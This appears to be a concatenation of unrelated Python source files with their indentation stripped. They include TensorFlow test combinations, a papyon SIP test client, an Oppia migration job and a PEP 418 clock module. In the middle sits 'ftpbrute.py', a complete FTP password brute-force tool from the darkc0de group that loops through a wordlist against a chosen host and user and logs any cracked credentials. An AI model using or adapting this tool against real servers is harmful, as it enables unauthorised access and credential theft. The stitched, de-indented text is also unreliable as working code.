optimizers_v2 = [gradient_descent_optimizer_v2_fn, adagrad_optimizer_v2_fn]
graph_and_eager_modes = ["graph", "eager"]
def distributions_and_v1_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
core_mirrored_strategy_with_gpu_and_cpu,
core_mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1)
def distributions_and_v2_optimizers():
"""DistributionStrategies and V2 Optimizers."""
return combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
core_mirrored_strategy_with_gpu_and_cpu,
core_mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v2)
| brchiu/tensorflow | tensorflow/contrib/distribute/python/combinations.py | Python | apache-2.0 | 14,495 |
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# This is an FTP brute force tool.
# This was written for educational purposes and pentesting only. Use it at your own risk.
# Suggestion: don't use a very large wordlist, because the system needs to read it all before brute forcing, which causes delays ("that's cause LOSS"); maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : [email protected]
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk
import sys
import time
import os
from ftplib import FTP
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
log = "ftpbrute.log"
file = open(log, "a")
def MyFace() :
os.system(SysCls)
print "\n .___ .__ .__ _______ .___ "
print " __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ "
print " / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / "
print " / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / "
print " \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ "
print " \/ \/ \/ \/ \/ \/ \/ \/ \/ "
print " http://www.devilzc0de.com "
print " by : gunslinger_ "
print " ftpbrute.py version 1.0 "
print " Brute forcing ftp target "
print " Programmmer : gunslinger_ "
print " gunslinger[at]devilzc0de[dot]com "
print "_______________________________________________________________________________________________________________________________________\n"
file.write("\n .___ .__ .__ _______ .___ ")
file.write("\n __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ ")
file.write("\n / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / ")
file.write("\n / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / ")
file.write("\n \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ ")
file.write("\n \/ \/ \/ \/ \/ \/ \/ \/ \/ ")
file.write("\n http://www.devilzc0de.com ")
file.write("\n by : gunslinger_ ")
file.write("\n ftpbrute.py version 1.0 ")
file.write("\n Brute forcing ftp target ")
file.write("\n Programmmer : gunslinger_ ")
file.write("\n gunslinger[at]devilzc0de[dot]com ")
file.write("\n_______________________________________________________________________________________________________________________________________\n")
def HelpMe() :
MyFace()
print 'Usage: ./ftpbrute.py [options]\n'
print 'Options: -t, --target <hostname/ip> | Target to bruteforcing '
print ' -u, --user <user> | User for bruteforcing'
print ' -w, --wordlist <filename> | Wordlist used for bruteforcing'
print ' -h, --help <help> | print this help'
print ' \n'
print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n'
file.write( '\nUsage: ./ftpbrute.py [options]')
file.write( '\nOptions: -t, --target <hostname/ip> | Target to bruteforcing ')
file.write( '\n -u, --user <user> | User for bruteforcing')
file.write( '\n -w, --wordlist <filename> | Wordlist used for bruteforcing')
file.write( '\n -h, --help <help> | print this help')
file.write( '\n maybe you can use time.sleep(int) \n')
file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n')
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
HelpMe()
elif len(sys.argv) <= 1:
HelpMe()
def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ",user, ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
def Action ():
MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
Action()
try:
words = open(wordlist, "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
BruteForce(word.replace("\n",""))
file.close()
| knightmare2600/d4rkc0de | others/ftpbrute.py | Python | gpl-2.0 | 8,051 |
# -*- coding: utf-8 -*-
#
# papyon - a python client library for Msn
#
# Copyright (C) 2010 Collabora Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from base import *
sys.path.insert(0, "")
import papyon
from papyon.media.conference import *
from papyon.media.constants import *
class SIPClient(TestClient):
def __init__(self):
opts = [('-a', '--answer', {'type': 'choice', 'default': 'ignore',
'choices': ('ignore', 'accept', 'reject'),
'help': 'what to do on incoming call'}),
('-i', '--invite', {'type': 'string', 'default': '',
'help': 'peer to send call invite to'})
]
args = []
TestClient.__init__(self, "SIP Call", opts, args, SIPClientEvents)
def connected(self):
self.profile.presence = papyon.profile.Presence.ONLINE
self.profile.client_capabilities.has_webcam = True
self.profile.client_capabilities.supports_rtc_video = True
if self.options.invite:
gobject.timeout_add_seconds(2, self.invite)
def invite(self):
contact = self.address_book.search_contact(self.options.invite,
papyon.profile.NetworkID.MSN)
if contact is None:
print 'Unknown contact: %s' % self.options.invite
return False
call = self.call_manager.create_call(contact)
self.call_handler = CallEvents(call)
self.session_handler = MediaSessionHandler(call.media_session)
stream = call.media_session.create_stream("audio",
MediaStreamDirection.BOTH, True)
call.media_session.add_stream(stream)
stream = call.media_session.create_stream("video",
MediaStreamDirection.BOTH, True)
call.media_session.add_stream(stream)
call.invite()
return False
class SIPClientEvents(TestClientEvents):
def __init__(self, client):
TestClientEvents.__init__(self, client)
def on_invite_conference(self, call):
print "INVITED : call-id = %s" % call.id
self.call_handler = CallEvents(call)
self.session_handler = MediaSessionHandler(call.media_session)
call.ring()
if self._client.options.answer == 'accept':
call.accept()
elif self._client.options.answer == 'reject':
call.reject()
class CallEvents(papyon.event.CallEventInterface):
def __init__(self, call):
papyon.event.CallEventInterface.__init__(self, call)
if __name__ == "__main__":
client = SIPClient()
client.run()
| billiob/papyon | tests/test_sip_client.py | Python | gpl-2.0 | 3,295 |
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""One-off jobs for collections."""
import logging
from core import jobs
from core.domain import collection_domain
from core.domain import collection_services
from core.platform import models
import feconf
(base_models, collection_models,) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.collection])
class CollectionMigrationJob(jobs.BaseMapReduceJobManager):
"""A reusable one-time job that may be used to migrate collection schema
versions. This job will load all existing collections from the data store
and immediately store them back into the data store. The loading process of
a collection in collection_services automatically performs schema updating.
This job persists that conversion work, keeping collections up-to-date and
improving the load time of new collections.
"""
_DELETED_KEY = 'collection_deleted'
_ERROR_KEY = 'validation_error'
_MIGRATED_KEY = 'collection_migrated'
@classmethod
def entity_classes_to_map_over(cls):
return [collection_models.CollectionModel]
@staticmethod
def map(item):
if item.deleted:
yield (CollectionMigrationJob._DELETED_KEY,
'Encountered deleted collection.')
return
# Note: the read will bring the collection up to the newest version.
collection = collection_services.get_collection_by_id(item.id)
try:
collection.validate(strict=False)
except Exception as e:
logging.error(
'Collection %s failed validation: %s' % (item.id, e))
yield (CollectionMigrationJob._ERROR_KEY,
'Collection %s failed validation: %s' % (item.id, e))
return
# Write the new collection into the datastore if it's different from
# the old version.
if item.schema_version <= feconf.CURRENT_COLLECTION_SCHEMA_VERSION:
commit_cmds = [{
'cmd': collection_domain.CMD_MIGRATE_SCHEMA_TO_LATEST_VERSION,
'from_version': item.schema_version,
'to_version': str(
feconf.CURRENT_COLLECTION_SCHEMA_VERSION)
}]
collection_services.update_collection(
feconf.MIGRATION_BOT_USERNAME, item.id, commit_cmds,
'Update collection schema version to %d.' % (
feconf.CURRENT_COLLECTION_SCHEMA_VERSION))
yield (CollectionMigrationJob._MIGRATED_KEY,
'Collection successfully migrated.')
@staticmethod
def reduce(key, values):
yield (key, values)
| shaz13/oppia | core/domain/collection_jobs_one_off.py | Python | apache-2.0 | 3,258 |
"""
from: https://bitbucket.org/haypo/misc/src/tip/python/pep418.py
Implementation of the PEP 418 in pure Python using ctypes.
Functions:
- clock()
- get_clock_info(name)
- monotonic(): not always available
 - perf_counter()
- process_time()
- sleep()
- time()
Constants:
- has_monotonic (bool): True if time.monotonic() is available
"""
# flake8: noqa
# TODO: gethrtime() for Solaris/OpenIndiana
# TODO: call GetSystemTimeAdjustment() to get the resolution
# TODO: other FIXME
import os
import sys
import time as python_time
has_mach_absolute_time = False
has_clock_gettime = False
has_gettimeofday = False
has_ftime = False
has_delay = False
has_libc_time = False
has_libc_clock = False
has_libc_sleep = False
has_GetTickCount64 = False
CLOCK_REALTIME = None
CLOCK_MONOTONIC = None
CLOCK_PROCESS_CPUTIME_ID = None
CLOCK_HIGHRES = None
CLOCK_PROF = None
try:
import ctypes
import ctypes.util
from ctypes import POINTER
from ctypes import byref
except ImportError as err:
pass
else:
def ctypes_oserror():
errno = ctypes.get_errno()
message = os.strerror(errno)
return OSError(errno, message)
time_t = ctypes.c_long
if os.name == "nt":
from ctypes import windll
from ctypes.wintypes import BOOL
from ctypes.wintypes import DWORD
from ctypes.wintypes import FILETIME
from ctypes.wintypes import HANDLE
LARGEINTEGER = ctypes.c_int64
LARGEINTEGER_p = POINTER(LARGEINTEGER)
FILETIME_p = POINTER(FILETIME)
ULONGLONG = ctypes.c_uint64
def ctypes_winerror():
errno = ctypes.get_errno()
message = os.strerror(errno)
return WindowsError(errno, message)
_QueryPerformanceFrequency = windll.kernel32.QueryPerformanceFrequency
_QueryPerformanceFrequency.restype = BOOL
_QueryPerformanceFrequency.argtypes = (LARGEINTEGER_p,)
def QueryPerformanceFrequency():
frequency = LARGEINTEGER()
ok = _QueryPerformanceFrequency(byref(frequency))
if not ok:
raise ctypes_winerror()
return int(frequency.value)
_QueryPerformanceCounter = windll.kernel32.QueryPerformanceCounter
_QueryPerformanceCounter.restype = BOOL
_QueryPerformanceCounter.argtypes = (LARGEINTEGER_p,)
def QueryPerformanceCounter():
frequency = LARGEINTEGER()
ok = _QueryPerformanceCounter(byref(frequency))
if not ok:
raise ctypes_winerror()
return int(frequency.value)
GetTickCount = windll.kernel32.GetTickCount
GetTickCount.restype = DWORD
GetTickCount.argtypes = ()
if hasattr(windll.kernel32, 'GetTickCount64'):
GetTickCount64 = windll.kernel32.GetTickCount64
GetTickCount64.restype = ULONGLONG
GetTickCount64.argtypes = ()
has_GetTickCount64 = True
GetCurrentProcess = windll.kernel32.GetCurrentProcess
GetCurrentProcess.argtypes = ()
GetCurrentProcess.restype = HANDLE
_GetProcessTimes = windll.kernel32.GetProcessTimes
_GetProcessTimes.argtypes = (HANDLE, FILETIME_p, FILETIME_p, FILETIME_p, FILETIME_p)
_GetProcessTimes.restype = BOOL
def filetime2py(obj):
return (obj.dwHighDateTime << 32) + obj.dwLowDateTime
def GetProcessTimes(handle):
creation_time = FILETIME()
exit_time = FILETIME()
kernel_time = FILETIME()
user_time = FILETIME()
ok = _GetProcessTimes(handle,
byref(creation_time), byref(exit_time),
byref(kernel_time), byref(user_time))
if not ok:
raise ctypes_winerror()
return (filetime2py(creation_time), filetime2py(exit_time),
filetime2py(kernel_time), filetime2py(user_time))
_GetSystemTimeAsFileTime = windll.kernel32.GetSystemTimeAsFileTime
_GetSystemTimeAsFileTime.argtypes = (FILETIME_p,)
_GetSystemTimeAsFileTime.restype = None
def GetSystemTimeAsFileTime():
system_time = FILETIME()
_GetSystemTimeAsFileTime(byref(system_time))
return filetime2py(system_time)
libc_name = ctypes.util.find_library('c')
if libc_name:
libc = ctypes.CDLL(libc_name, use_errno=True)
clock_t = ctypes.c_ulong
if sys.platform == 'darwin':
mach_absolute_time = libc.mach_absolute_time
mach_absolute_time.argtypes = ()
mach_absolute_time.restype = ctypes.c_uint64
has_mach_absolute_time = True
class mach_timebase_info_data_t(ctypes.Structure):
_fields_ = (
('numer', ctypes.c_uint32),
('denom', ctypes.c_uint32),
)
mach_timebase_info_data_p = POINTER(mach_timebase_info_data_t)
_mach_timebase_info = libc.mach_timebase_info
_mach_timebase_info.argtypes = (mach_timebase_info_data_p,)
_mach_timebase_info.restype = ctypes.c_int
def mach_timebase_info():
timebase = mach_timebase_info_data_t()
_mach_timebase_info(byref(timebase))
return (timebase.numer, timebase.denom)
_libc_clock = libc.clock
_libc_clock.argtypes = ()
_libc_clock.restype = clock_t
has_libc_clock = True
if hasattr(libc, 'sleep'):
_libc_sleep = libc.sleep
_libc_sleep.argtypes = (ctypes.c_uint,)
_libc_sleep.restype = ctypes.c_uint
has_libc_sleep = True
if hasattr(libc, 'gettimeofday'):
class timeval(ctypes.Structure):
_fields_ = (
('tv_sec', time_t),
('tv_usec', ctypes.c_long),
)
timeval_p = POINTER(timeval)
timezone_p = ctypes.c_void_p
_gettimeofday = libc.gettimeofday
# FIXME: some platforms only expect one argument
_gettimeofday.argtypes = (timeval_p, timezone_p)
_gettimeofday.restype = ctypes.c_int
def gettimeofday():
tv = timeval()
err = _gettimeofday(byref(tv), None)
if err:
raise ctypes_oserror()
return tv
has_gettimeofday = True
time_t_p = POINTER(time_t)
if hasattr(libc, 'time'):
_libc__time = libc.time
_libc__time.argtypes = (time_t_p,)
_libc__time.restype = time_t
def _libc_time():
return _libc__time(None)
has_libc_time = True
if sys.platform.startswith(("freebsd", "openbsd")):
librt_name = libc_name
else:
librt_name = ctypes.util.find_library('rt')
if librt_name:
librt = ctypes.CDLL(librt_name, use_errno=True)
if hasattr(librt, 'clock_gettime'):
clockid_t = ctypes.c_int
class timespec(ctypes.Structure):
_fields_ = (
('tv_sec', time_t),
('tv_nsec', ctypes.c_long),
)
timespec_p = POINTER(timespec)
_clock_gettime = librt.clock_gettime
_clock_gettime.argtypes = (clockid_t, timespec_p)
_clock_gettime.restype = ctypes.c_int
def clock_gettime(clk_id):
ts = timespec()
err = _clock_gettime(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
has_clock_gettime = True
_clock_settime = librt.clock_settime
_clock_settime.argtypes = (clockid_t, timespec_p)
_clock_settime.restype = ctypes.c_int
def clock_settime(clk_id, value):
ts = timespec()
ts.tv_sec = int(value)
ts.tv_nsec = int(float(abs(value)) % 1.0 * 1e9)
err = _clock_settime(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
_clock_getres = librt.clock_getres
_clock_getres.argtypes = (clockid_t, timespec_p)
_clock_getres.restype = ctypes.c_int
def clock_getres(clk_id):
ts = timespec()
err = _clock_getres(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
if sys.platform.startswith("linux"):
CLOCK_REALTIME = 0
CLOCK_MONOTONIC = 1
CLOCK_PROCESS_CPUTIME_ID = 2
elif sys.platform.startswith("freebsd"):
CLOCK_REALTIME = 0
CLOCK_PROF = 2
CLOCK_MONOTONIC = 4
elif sys.platform.startswith("openbsd"):
CLOCK_REALTIME = 0
CLOCK_MONOTONIC = 3
elif sys.platform.startswith("sunos"):
CLOCK_REALTIME = 3
CLOCK_HIGHRES = 4
# clock_gettime(CLOCK_PROCESS_CPUTIME_ID) fails with errno 22
# on OpenSolaris
# CLOCK_PROCESS_CPUTIME_ID = 5
def _clock_gettime_info(use_info, clk_id):
value = clock_gettime(clk_id)
if use_info:
name = {
CLOCK_MONOTONIC: 'CLOCK_MONOTONIC',
CLOCK_PROF: 'CLOCK_PROF',
CLOCK_HIGHRES: 'CLOCK_HIGHRES',
CLOCK_PROCESS_CPUTIME_ID: 'CLOCK_PROCESS_CPUTIME_ID',
CLOCK_REALTIME: 'CLOCK_REALTIME',
}[clk_id]
try:
resolution = clock_getres(clk_id)
except OSError:
resolution = 1e-9
info = {
'implementation': 'clock_gettime(%s)' % name,
'resolution': resolution,
}
if clk_id in (CLOCK_MONOTONIC, CLOCK_PROF, CLOCK_HIGHRES, CLOCK_PROCESS_CPUTIME_ID):
info['monotonic'] = True
info['adjustable'] = False
elif clk_id in (CLOCK_REALTIME,):
info['monotonic'] = False
info['adjustable'] = True
else:
info = None
return (value, info)
has_monotonic = False
if os.name == 'nt':
# GetTickCount64() requires Windows Vista, Server 2008 or later
if has_GetTickCount64:
def _monotonic(use_info):
value = GetTickCount64() * 1e-3
if use_info:
info = {
'implementation': "GetTickCount64()",
"monotonic": True,
"resolution": 1e-3,
"adjustable": False,
}
# FIXME: call GetSystemTimeAdjustment() to get the resolution
else:
info = None
return (value, info)
has_monotonic = True
else:
def _monotonic(use_info):
ticks = GetTickCount()
if ticks < _monotonic.last:
# Integer overflow detected
_monotonic.delta += 2**32
_monotonic.last = ticks
value = (ticks + _monotonic.delta) * 1e-3
if use_info:
info = {
'implementation': "GetTickCount()",
"monotonic": True,
"resolution": 1e-3,
"adjustable": False,
}
# FIXME: call GetSystemTimeAdjustment() to get the resolution
else:
info = None
return (value, info)
_monotonic.last = 0
_monotonic.delta = 0
has_monotonic = True
elif has_mach_absolute_time:
def _monotonic(use_info):
if _monotonic.factor is None:
timebase = mach_timebase_info()
_monotonic.factor = timebase[0] / timebase[1] * 1e-9
value = mach_absolute_time() * _monotonic.factor
if use_info:
info = {
'implementation': "mach_absolute_time()",
'resolution': _monotonic.factor,
'monotonic': True,
'adjustable': False,
}
else:
info = None
return (value, info)
_monotonic.factor = None
has_monotonic = True
elif has_clock_gettime and CLOCK_HIGHRES is not None:
def _monotonic(use_info):
return _clock_gettime_info(use_info, CLOCK_HIGHRES)
has_monotonic = True
elif has_clock_gettime and CLOCK_MONOTONIC is not None:
def _monotonic(use_info):
return _clock_gettime_info(use_info, CLOCK_MONOTONIC)
has_monotonic = True
if has_monotonic:
def monotonic():
return _monotonic(False)[0]
def _perf_counter(use_info):
info = None
if _perf_counter.use_performance_counter:
if _perf_counter.performance_frequency is None:
value, info = _win_perf_counter(use_info)
if value is not None:
return (value, info)
if _perf_counter.use_monotonic:
# The monotonic clock is preferred over the system time
try:
return _monotonic(use_info)
except (OSError, WindowsError):
_perf_counter.use_monotonic = False
return _time(use_info)
_perf_counter.use_performance_counter = (os.name == 'nt')
if _perf_counter.use_performance_counter:
_perf_counter.performance_frequency = None
_perf_counter.use_monotonic = has_monotonic
def perf_counter():
return _perf_counter(False)[0]
if os.name == 'nt':
def _process_time(use_info):
handle = GetCurrentProcess()
process_times = GetProcessTimes(handle)
value = (process_times[2] + process_times[3]) * 1e-7
if use_info:
info = {
"implementation": "GetProcessTimes()",
"resolution": 1e-7,
"monotonic": True,
"adjustable": False,
# FIXME: call GetSystemTimeAdjustment() to get the resolution
}
else:
info = None
return (value, info)
else:
import os
try:
import resource
except ImportError:
has_resource = False
else:
has_resource = True
def _process_time(use_info):
info = None
if _process_time.clock_id is not None:
try:
return _clock_gettime_info(use_info, _process_time.clock_id)
except OSError:
_process_time.clock_id = None
if _process_time.use_getrusage:
try:
usage = resource.getrusage(resource.RUSAGE_SELF)
value = usage[0] + usage[1]
except OSError:
_process_time.use_getrusage = False
else:
if use_info:
info = {
"implementation": "getrusage(RUSAGE_SELF)",
"resolution": 1e-6,
"monotonic": True,
"adjustable": False,
}
return (value, info)
if _process_time.use_times:
try:
times = os.times()
value = times[0] + times[1]
except OSError:
                _process_time.use_times = False
else:
if use_info:
try:
ticks_per_second = os.sysconf("SC_CLK_TCK")
except ValueError:
ticks_per_second = 60 # FIXME: get HZ constant
info = {
"implementation": "times()",
"resolution": 1.0 / ticks_per_second,
"monotonic": True,
"adjustable": False,
}
return (value, info)
return _libc_clock_info(use_info)
if has_clock_gettime and CLOCK_PROCESS_CPUTIME_ID is not None:
_process_time.clock_id = CLOCK_PROCESS_CPUTIME_ID
elif has_clock_gettime and CLOCK_PROF is not None:
_process_time.clock_id = CLOCK_PROF
else:
_process_time.clock_id = None
_process_time.use_getrusage = has_resource
# On OS/2, only the 5th field of os.times() is set, others are zeros
_process_time.use_times = (hasattr(os, 'times') and os.name != 'os2')
def process_time():
return _process_time(False)[0]
if os.name == "nt":
def _time(use_info):
value = GetSystemTimeAsFileTime() * 1e-7
if use_info:
info = {
'implementation': 'GetSystemTimeAsFileTime',
'resolution': 1e-7,
'monotonic': False,
# FIXME: call GetSystemTimeAdjustment() to get the resolution
# and adjustable
}
else:
info = None
return (value, info)
else:
def _time(use_info):
info = None
if has_clock_gettime and CLOCK_REALTIME is not None:
try:
return _clock_gettime_info(use_info, CLOCK_REALTIME)
except OSError:
# CLOCK_REALTIME is not supported (unlikely)
pass
if has_gettimeofday:
try:
tv = gettimeofday()
except OSError:
# gettimeofday() should not fail
pass
else:
if use_info:
info = {
'monotonic': False,
"implementation": "gettimeofday()",
"resolution": 1e-6,
'adjustable': True,
}
value = tv.tv_sec + tv.tv_usec * 1e-6
return (value, info)
# FIXME: implement ftime()
if has_ftime:
if use_info:
info = {
"implementation": "ftime()",
"resolution": 1e-3,
'monotonic': False,
'adjustable': True,
}
value = ftime()
elif has_libc_time:
if use_info:
info = {
"implementation": "time()",
"resolution": 1.0,
'monotonic': False,
'adjustable': True,
}
value = float(_libc_time())
else:
if use_info:
info = {
"implementation": "time.time()",
'monotonic': False,
'adjustable': True,
}
if os.name == "nt":
# On Windows, time.time() uses ftime()
info["resolution"] = 1e-3
else:
# guess that time.time() uses gettimeofday()
info["resolution"] = 1e-6
value = python_time.time()
return (value, info)
def time():
return _time(False)[0]
try:
import select
except ImportError:
has_select = False
else:
# FIXME: On Windows, select.select([], [], [], seconds) fails with
# select.error(10093)
has_select = (hasattr(select, "select") and os.name != "nt")
if has_select:
def _sleep(seconds):
return select.select([], [], [], seconds)
elif has_delay:
def _sleep(seconds):
milliseconds = int(seconds * 1000)
# FIXME
delay(milliseconds)
#elif os.name == "nt":
# def _sleep(seconds):
# milliseconds = int(seconds * 1000)
# # FIXME: use ctypes
# win32api.ResetEvent(hInterruptEvent);
# win32api.WaitForSingleObject(sleep.sigint_event, milliseconds)
#
# sleep.sigint_event = win32api.CreateEvent(NULL, TRUE, FALSE, FALSE)
# # SetEvent(sleep.sigint_event) will be called by the signal handler of SIGINT
elif os.name == "os2":
def _sleep(seconds):
milliseconds = int(seconds * 1000)
# FIXME
DosSleep(milliseconds)
elif has_libc_sleep:
def _sleep(seconds):
seconds = int(seconds)
_libc_sleep(seconds)
else:
def _sleep(seconds):
python_time.sleep(seconds)
def sleep(seconds):
if seconds < 0:
raise ValueError("sleep length must be non-negative")
_sleep(seconds)
def _libc_clock_info(use_info):
if use_info:
info = {
'implementation': 'clock()',
'resolution': 1.0,
# FIXME: 'resolution': 1.0 / CLOCKS_PER_SEC,
'monotonic': True,
'adjustable': False,
}
if os.name != "nt":
info['monotonic'] = True
else:
info = None
if has_libc_clock:
value = _libc_clock()
if use_info:
info['implementation'] = 'clock()'
else:
value = python_time.clock()
if use_info:
info['implementation'] = 'time.clock()'
return (value, info)
def _win_perf_counter(use_info):
if _win_perf_counter.perf_frequency is None:
try:
_win_perf_counter.perf_frequency = float(QueryPerformanceFrequency())
except WindowsError:
# QueryPerformanceFrequency() fails if the installed
# hardware does not support a high-resolution performance
# counter
return (None, None)
value = QueryPerformanceCounter() / _win_perf_counter.perf_frequency
if use_info:
info = {
'implementation': 'QueryPerformanceCounter',
'resolution': 1.0 / _win_perf_counter.perf_frequency,
'monotonic': True,
'adjustable': False,
}
else:
info = None
return (value, info)
_win_perf_counter.perf_frequency = None
if os.name == 'nt':
def _clock(use_info):
info = None
if _clock.use_performance_counter:
value, info = _win_perf_counter(use_info)
if value is not None:
return (value, info)
return _libc_clock_info(use_info)
_clock.use_performance_counter = True
else:
def _clock(use_info):
return _libc_clock_info(use_info)
def clock():
return _clock(False)[0]
class clock_info(object):
def __init__(self, implementation, monotonic, adjustable, resolution):
self.implementation = implementation
self.monotonic = monotonic
self.adjustable = adjustable
self.resolution = resolution
def __repr__(self):
return (
            'clockinfo(adjustable=%s, implementation=%r, monotonic=%s, resolution=%s)'
% (self.adjustable, self.implementation, self.monotonic, self.resolution))
def get_clock_info(name):
if name == 'clock':
info = _clock(True)[1]
elif name == 'perf_counter':
info = _perf_counter(True)[1]
elif name == 'process_time':
info = _process_time(True)[1]
elif name == 'time':
info = _time(True)[1]
elif has_monotonic and name == 'monotonic':
info = _monotonic(True)[1]
else:
raise ValueError("unknown clock: %s" % name)
return clock_info(**info)
if __name__ == "__main__":
import threading
import unittest
from errno import EPERM
class TestPEP418(unittest.TestCase):
if not hasattr(unittest.TestCase, 'assertIsInstance'):
# Python < 2.7 or Python < 3.2
def assertIsInstance(self, obj, klass):
self.assertTrue(isinstance(obj, klass))
def assertGreater(self, a, b):
self.assertTrue(a > b)
def assertLess(self, a, b):
self.assertTrue(a < b)
def assertLessEqual(self, a, b):
self.assertTrue(a <= b)
def assertAlmostEqual(self, first, second, delta):
self.assertTrue(abs(first - second) <= delta)
def test_clock(self):
clock()
info = get_clock_info('clock')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
def test_get_clock_info(self):
clocks = ['clock', 'perf_counter', 'process_time', 'time']
if has_monotonic:
clocks.append('monotonic')
for name in clocks:
info = get_clock_info(name)
self.assertIsInstance(info.implementation, str)
self.assertNotEqual(info.implementation, '')
self.assertIsInstance(info.monotonic, bool)
self.assertIsInstance(info.resolution, float)
# 0 < resolution <= 1.0
self.assertGreater(info.resolution, 0)
self.assertLessEqual(info.resolution, 1)
self.assertIsInstance(info.adjustable, bool)
self.assertRaises(ValueError, get_clock_info, 'xxx')
if not has_monotonic:
print("Skip test_monotonic: need time.monotonic")
else:
def test_monotonic(self):
t1 = monotonic()
python_time.sleep(0.1)
t2 = monotonic()
dt = t2 - t1
self.assertGreater(t2, t1)
self.assertAlmostEqual(dt, 0.1, delta=0.2)
info = get_clock_info('monotonic')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
